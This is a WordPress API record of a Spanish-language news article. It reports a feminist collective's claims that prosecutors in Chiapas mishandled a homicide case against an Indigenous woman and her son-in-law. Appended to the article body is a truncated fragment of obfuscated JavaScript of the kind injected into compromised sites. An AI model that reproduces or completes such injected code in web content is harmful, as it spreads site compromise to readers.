{"id":18394,"date":"2024-10-17T03:44:29","date_gmt":"2024-10-17T03:44:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18394"},"modified":"2024-10-17T03:44:30","modified_gmt":"2024-10-17T03:44:30","slug":"colectiva-cereza-denuncia-irregularidades-en-caso-de-homicidio","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18394","title":{"rendered":"Colectiva Cereza denuncia irregularidades en caso de homicidio"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"771\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/WhatsApp-Image-2024-10-16-at-11.33.44-AM-2-1024x771.jpeg\" alt=\"\" class=\"wp-image-18395\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/WhatsApp-Image-2024-10-16-at-11.33.44-AM-2-1024x771.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/WhatsApp-Image-2024-10-16-at-11.33.44-AM-2-300x226.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/WhatsApp-Image-2024-10-16-at-11.33.44-AM-2-768x578.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/WhatsApp-Image-2024-10-16-at-11.33.44-AM-2-1536x1156.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/WhatsApp-Image-2024-10-16-at-11.33.44-AM-2.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>16 de octubre del 2024. San Crist\u00f3bal de La Casas.- Integrantes de la Colectiva Cereza han emitido han denunciando las irregularidades en la investigaci\u00f3n del asesinato de Juan, un hombre conocido en su comunidad por su comportamiento violento.<\/p>\n\n\n\n<p>Seg\u00fan Colectiva Cereza Juan ten\u00eda un historial de conflictos con sus vecinos y familiares, incluido el asesinato de uno de sus hermanos hace tres a\u00f1os. A pesar de su peligrosa reputaci\u00f3n, la Fiscal\u00eda Ind\u00edgena ha optado por acusar a Juana, su esposa, y a Ernesto, yerno de Juan, de su muerte, bas\u00e1ndose en lo que la Colectiva considera una &#8220;teor\u00eda telenovelesca&#8221;.<\/p>\n\n\n\n<p>En conferencia de prensa, Patricia Aracil afirm\u00f3 que en proximos d\u00edas ser\u00e1 la apelaci\u00f3n, ya que ambos acusados fueron sentenciados a 25 a\u00f1os, por lo que piden su libertad, ya que aseguran la Fiscal\u00eda Ind\u00edgena construy\u00f3 su caso sobre estereotipos y prejuicios, afirmando que Juana y Ernesto manten\u00edan una relaci\u00f3n sentimental, lo cual habr\u00eda sido el motivo del homicidio.<\/p>\n\n\n\n<p>Adem\u00e1s, acusa a la Fiscal\u00eda de manipular a los hijos adolescentes de Juan y Juana, identificados como ESS y CSS, forz\u00e1ndolos a testificar en contra de su madre y su t\u00edo bajo amenazas. Seg\u00fan la Colectiva, los derechos de los menores fueron vulnerados durante las entrevistas, que no siguieron los protocolos establecidos por la Suprema Corte de Justicia de la Naci\u00f3n para garantizar la protecci\u00f3n de los derechos humanos de los ni\u00f1os y adolescentes.<\/p>\n\n\n\n<p>La Colectiva tambi\u00e9n se\u00f1ala la falta de garant\u00edas procesales durante el juicio, donde los testimonios de los menores fueron presentados por lectura despu\u00e9s de que la Fiscal\u00eda los declarara &#8220;no aptos&#8221; para testificar en audiencia. Esta evaluaci\u00f3n se bas\u00f3 en una supuesta entrevista psicol\u00f3gica que examinaron, sin pruebas cl\u00ednicas, que los adolescentes padec\u00edan trastorno de estr\u00e9s postraum\u00e1tico. De manera pol\u00e9mica, la jueza concluy\u00f3 que los menores sufr\u00edan un &#8220;trastorno mental transitorio&#8221;.<\/p>\n\n\n\n<p>Frente a estas irregularidades, la comunidad ha tomado medidas para proteger a los menores y ha impedido que los polic\u00edas de investigaci\u00f3n ingresen nuevamente al territorio. A pesar de esto, la Fiscal\u00eda ha argumentado que los ni\u00f1os no comparecen por miedo, lo que, seg\u00fan el comunicado de la Colectiva Cereza, es una distorsi\u00f3n de los hechos. La organizaci\u00f3n asegura que la verdadera raz\u00f3n es la defensa de los derechos de los menores y la manipulaci\u00f3n ejercida por las autoridades<\/p>\n\n\n\n<p>La Colectiva Cereza exige una investigaci\u00f3n imparcial y el respeto de los derechos de Juana, Ernesto y los menores involucrados, cuestionando la legitimidad de un proceso judicial que considera viciado desde su origen. Seg\u00fan sus declaraciones, el caso no solo refleja el machismo y los prejuicios contra las mujeres ind\u00edgenas, sino tambi\u00e9n un abuso de poder por parte de las autoridades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 16 de octubre del 2024. San Crist\u00f3bal de La Casas.- Integrantes de la Colectiva Cereza han emitido han denunciando las irregularidades en la investigaci\u00f3n del asesinato de Juan, un hombre conocido en su comunidad por su comportamiento violento. Seg\u00fan Colectiva Cereza Juan ten\u00eda un historial de conflictos con sus vecinos y familiares, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18395,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-18394","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18394","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18394"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18394\/revisions"}],"predecessor-version":[{"id":18396,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18394\/revisions\/18396"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18395"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18394"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18394"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18394"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}